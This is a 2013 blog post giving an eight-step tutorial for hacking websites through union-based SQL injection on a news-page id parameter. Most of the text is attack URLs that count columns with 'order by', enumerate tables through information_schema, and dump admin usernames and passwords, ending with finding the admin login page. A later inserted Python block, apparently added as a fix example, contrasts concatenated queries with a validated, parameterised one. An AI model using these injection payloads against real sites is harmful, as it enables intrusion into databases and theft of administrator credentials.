Tuesday, March 5, 2013

How to Hack a Website With SQL Injection Techniques

Understanding SQL injection: SQL injection is a hacking technique carried out by modifying the SQL commands that the client application holds in memory, and a technique for exploiting web applications that use a database for data storage.

What you need to know before attempting SQL injection on MySQL:

characters: ' or -
comments: /* or --
information_schema: for MySQL version 5.x, not supported on MySQL version 4.x
[Step 1]

    
Look for targets

For example: [site]/berita.php?id=100

Add the character ' at the end of the URL, or add the character "-", to see whether an error message appears.

Example:

[site]/berita.php?id=100' or

[site]/berita.php?id=-100

An error message then appears, as follows [many more]
[Step 2]

    
Find and count the number of tables that exist in the database ...

Use the command: order by

Example:

[site]/berita.php?id=-100+order+by+1-- or

[site]/berita.php?id=-100+order+by+1/*

Check step by step (one at a time) ...

For example:

[site]/berita.php?id=-100+order+by+1--

[site]/berita.php?id=-100+order+by+2--

[site]/berita.php?id=-100+order+by+3--

[site]/berita.php?id=-100+order+by+4--

Continue until an error appears or the error message goes missing ...

For example: [site]/berita.php?id=-100+order+by+9--

This means the number we take is 8

This gives [site]/berita.php?id=-100+order+by+8--
[Step 3]

    
To bring out the numbers that appear on the page, use union

because the error occurred at number 9

then: [site]/berita.php?id=-100+union+select+1,2,3,4,5,6,7,8--

Suppose the number that comes out is 5

Use version() or @@version to check which SQL version is in use, entering the command at the number that came out earlier

e.g.: [site]/berita.php?id=-100+union+select+1,2,3,4,version(),6,7,8-- or

[site]/berita.php?id=-100+union+select+1,2,3,4,@@version,6,7,8--

If the version in use turns out to be version 4, leave it, because in version 4 we have to guess the tables and columns on the site ourselves, since the command from+information_schema cannot be used.

For version 5 you are lucky: you do not have to guess the tables and columns as in version 4, because in version 5 the command from+information_schema can be used.
[Step 4]

    
To display the tables on the site:

command table_name >>> entered at the number that came out earlier

command +from+information_schema.tables/* >>> inserted after the last number

Code:

[site]/berita.php?id=-100+union+select+1,2,3,4,table_name,6,7,8+from+information_schema.tables--

Suppose the table that appears is "admin"
[Step 5]

    
To display all the contents of the table:

command group_concat(table_name) >>> entered at the number that came out earlier

command +from+information_schema.tables+where+table_schema=database() >>> inserted after the last number

   
[Step 6]

    
command group_concat(column_name) >>> entered at the number that came out earlier

command +from+information_schema.columns+where+table_name=0xhexa-- >>> inserted after the last number

At this stage you must convert the word from the table contents to hexadecimal.

Website used for the conversion:

http://www.v3n0m.net/ascii.htm

For example, if the word you want to convert is admin, the result is 61646D696E

   
[Step 7]

    
To bring up the contents of what came out of the table:

command concat_ws(0x3a, the columns whose contents are to be brought out) >>> entered at the number that came out earlier

command +from+(name of the table found) >>> inserted after the last number

Example:

[site]/berita.php?id=-100+union+select+1,2,3,4,concat_ws(0x3a,the column contents),6,7,8+from+(name of the table found)--

For example, the words that come out are id, username, password

    
Example:

   
[Step 8]

    
The last stage: look for the admin or login page.
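
Why the probes in Steps 1 to 3 get a response, and the fix that stops them, as an added example that is not part of the original post. It assumes Python's sqlite3 standing in for the PHP/MySQL site and a constructed three-column table named berita, so the eight-number union above becomes three.

```python
import re
import sqlite3

# Constructed probes mirroring Steps 1-3 above, adapted to a 3-column table
# ("+" in the URLs decodes to a space).
PROBES = ["100", "100'", "-100 order by 3--", "-100 order by 4--",
          "-100 union select 1,2,3--"]

def make_db():
    # Constructed sample data standing in for the site's news table.
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE berita (id INTEGER PRIMARY KEY, title TEXT, body TEXT)")
    db.execute("INSERT INTO berita VALUES (100, 'Headline', 'Story text')")
    return db

def fetch_vulnerable(db, raw_id):
    # Before: the request value is concatenated into the SQL text and parsed as SQL.
    # Echoing the database error to the client is what makes Step 1 informative.
    try:
        return db.execute(
            "SELECT id, title, body FROM berita WHERE id = " + raw_id).fetchall()
    except sqlite3.Error as exc:
        return "SQL error: " + str(exc)

def fetch_hardened(db, raw_id):
    # After: accept only an ASCII integer, then bind it as data with a placeholder.
    if not re.fullmatch(r"[0-9]{1,9}", raw_id):
        return "rejected"  # generic response, no database detail
    return db.execute(
        "SELECT id, title, body FROM berita WHERE id = ?", (int(raw_id),)).fetchall()

def compare():
    # Map each probe to (result before the fix, result after the fix).
    db = make_db()
    return {p: (fetch_vulnerable(db, p), fetch_hardened(db, p)) for p in PROBES}

if __name__ == "__main__":
    for probe, (before, after) in compare().items():
        print(f"{probe!r:30} before={before!r}  after={after!r}")
```

The hardened function returns the same generic result for every non-integer value, so neither the quote test nor the order by count yields a usable signal.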
That is my post for now on How to Hack a Website With SQL Injection Techniques; other hacking tutorials will follow, so keep stopping by here :D
Source: Hacker Newbie
